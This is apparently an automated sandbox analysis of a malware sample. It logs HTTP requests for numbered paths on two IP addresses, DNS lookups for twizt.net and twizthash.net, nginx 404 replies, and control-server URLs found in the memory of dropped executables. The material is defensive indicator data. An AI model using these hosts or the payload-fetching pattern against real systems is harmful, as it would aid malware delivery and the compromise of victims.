Source: global traffic	HTTP traffic detected: GET /ALLBSTATAASASD HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66

Source: global traffic	DNS traffic detected: DNS query: twizt.net
Source: global traffic	DNS traffic detected: DNS query: twizthash.net

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:27:24 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:28:16 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:28:19 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:28:21 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:28:23 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:28:26 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: T52Z708x2p.exe, 00000001.00000003.1397284019.0000000000482000.00000004.00000020.00020000.00000000.sdmp, T52Z708x2p.exe, 00000001.00000002.1398181396.0000000000485000.00000004.00000020.00020000.00000000.sdmp, 1706633239.exe, 00000005.00000002.1484456893.000000000053E000.00000004.00000020.00020000.00000000.sdmp, 1706633239.exe, 00000005.00000000.1450900740.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1706633239.exe, 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000006.00000002.1966173412.0000000005B70000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000006.00000000.1473803939.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000013.00000000.1588390233.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 446629599.exe, 00000021.00000000.1949731068.0000000000410000.00000002.00000001.01000000.0000000E.sdmp, 446629599.exe, 00000021.00000002.1986636602.0000000000410000.00000002.00000001.01000000.0000000E.sdmp, 446629599.exe, 00000021.00000002.1986738654.000000000057E000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000002.2627233365.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000023.00000000.1976145001.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000030.00000002.2090805387.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000030.00000000.2069869412.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000034.00000000.2150937536.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000034.00000002.2171612447.0000000000410000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://185.215.113.66/
Source: sysppvrdnvs.exe, 00000023.00000002.2636446541.0000000002F2C000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/1
Source: sysppvrdnvs.exe, 00000023.00000003.2087179391.00000000005CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/11
Source: sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000003.2306001525.00000000005CC000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000003.2087179391.00000000005CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/1:
Source: sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000003.2306001525.00000000005CC000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000003.2087179391.00000000005CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/1A
Source: sysppvrdnvs.exe, 00000006.00000003.1609744696.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/1B
Source: sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/1C
Source: sysppvrdnvs.exe, 00000006.00000003.1609744696.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000003.1610746770.0000000003669000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/1C:
Source: sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/1L
Source: sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000588000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/1LMEM08
Source: sysppvrdnvs.exe, 00000006.00000003.1606769387.000000000368C000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000003.2087225373.000000000353E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/1NNC:
Source: sysppvrdnvs.exe, 00000023.00000002.2630132589.0000000000577000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/1a
Source: sysppvrdnvs.exe, 00000006.00000003.1609744696.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/1dler
Source: sysppvrdnvs.exe, 00000023.00000003.2087179391.00000000005CC000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000002.2630132589.0000000000577000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/1e
Source: sysppvrdnvs.exe, 00000023.00000002.2630132589.0000000000577000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/1m
Source: sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/1rosoft
Source: sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000548000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000003.1804997304.0000000000596000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000588000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000003.2306001525.00000000005CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/2
